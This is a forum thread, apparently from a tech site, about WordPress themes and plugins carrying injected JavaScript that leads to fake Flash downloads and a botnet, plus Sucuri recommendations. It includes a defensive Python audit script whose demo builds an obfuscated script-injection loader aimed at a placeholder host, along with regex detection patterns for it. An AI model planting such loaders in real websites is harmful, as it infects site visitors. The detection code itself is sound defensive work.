I have a Wordpress plugin with ~100k active installs. Recently I've started getting emails from people wanting to buy the plugin from me. I'm assuming they want it for a botnet or other nefarious purposes. I'm not sure if Wordpress has stepped up its monitoring of plugins or not, but in the past there was little oversight of the plugins, and adding a direct backdoor to those 100k servers would be trivial, not to mention the millions of people that could be reached via JavaScript injection.
This is the whole reason Sucuri [1] exists and blew up in popularity shortly after it launched. If you are running Wordpress, I'd definitely recommend Sucuri.

If you don't have a paid plan, at least run the free scan once a month or more to make sure you weren't hit by anything. I don't mind Wordpress as a CMS, but it is a *constant* target. Constant. And nothing looks worse than having "Cheap Canadian Viagra" at the bottom of your corporate website.

[1] https://sucuri.net/
tl;dr *Someone hacks WordPress websites and includes strange .js files that a) lead to fake Flash downloads that install a botnet on your PC and b) abuse your browser to get URLs from a Google search.*
I wonder if the point of the botnet is to get SERPs from Google? They stopped letting you know quite a bit of information about keywords, rankings, etc. a while ago.

Seems like there is lots of potential for blackhat SEO with this type of botnet.
The domain hosting one of the files seemed too legit to me, so I checked, and it's an actual website of a Brazilian company, http://cjccontabil.com.br/. It seems whoever built the website got a WP theme (free, I assume) from somewhere which happened to include this malicious file (/wp-content/themes/Hermes/main1.js). I guess folks are downloading free stuff and hosting it on their websites without inspecting the content of all the files, so if you think you're safe just by making sure your system is injection-proof, think again: are you using some theme or plugin downloaded from somewhere on the web, and if so, have you checked every single file included?
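A defender-side audit of the kind the comment above recommends, as an added example that is not part of the thread: it hashes every .js/.php file under a wp-content tree so a later run can show what was added or changed, and flags common obfuscation indicators for manual review. The directory layout, file contents and indicator list are constructed assumptions for the demo, not a signature set.

```python
import hashlib, re, tempfile
from pathlib import Path

# Heuristic obfuscation indicators (an assumption of this example): a hit means "read this file", not "malicious".
SUSPICIOUS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "document.write-tag": re.compile(r"document\.write\s*\(.*(?:<|%3C)(?:script|iframe)", re.I),
    "hex-escape-run": re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I),
}

def audit_wp_content(wp_content: Path) -> dict:
    """Hash every .js/.php under themes/ and plugins/ (where third-party code lands) and record indicator hits."""
    report = {}
    for sub in ("themes", "plugins"):
        base = wp_content / sub
        if not base.is_dir():
            continue
        for p in base.rglob("*"):
            if p.suffix.lower() not in (".js", ".php"):
                continue
            text = p.read_text(errors="replace")
            hits = [name for name, rx in SUSPICIOUS.items() if rx.search(text)]
            report[p.relative_to(wp_content).as_posix()] = {
                "sha256": hashlib.sha256(p.read_bytes()).hexdigest(), "hits": hits}
    return report

def diff_manifests(baseline: dict, current: dict) -> dict:
    """Compare two audit runs: new files, deleted files, and files whose hash changed."""
    changed = [k for k in current if k in baseline and current[k]["sha256"] != baseline[k]["sha256"]]
    return {"added": sorted(set(current) - set(baseline)),
            "removed": sorted(set(baseline) - set(current)), "changed": sorted(changed)}

def demo() -> dict:
    # Constructed wp-content tree with one clean theme script at baseline time.
    root = Path(tempfile.mkdtemp()) / "wp-content"
    theme = root / "themes" / "sample-theme"
    theme.mkdir(parents=True)
    (theme / "script.js").write_text("jQuery(function () { jQuery('.menu').show(); });\n")
    baseline = audit_wp_content(root)
    # Later run: the theme script was edited and an obfuscated loader appeared (constructed sample).
    (theme / "script.js").write_text("jQuery(function () { jQuery('.menu').fadeIn(); });\n")
    (theme / "inject.js").write_text(
        "var s=String.fromCharCode(104,116,116,112);"
        "document.write(unescape('%3Cscript src='+s+'://example.invalid/x.js%3E%3C/script%3E'));\n")
    current = audit_wp_content(root)
    return {"diff": diff_manifests(baseline, current),
            "hits": {k: v["hits"] for k, v in current.items() if v["hits"]}}
```

Run the audit once against a known-clean install, keep the manifest outside the web root, and diff each later run against it; a new or changed file with indicator hits is what to read first.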
Wow, this one infected at least 1,000+ sites according to Meanpath [1].

[1] http://meanpath.com/f/j5LK9K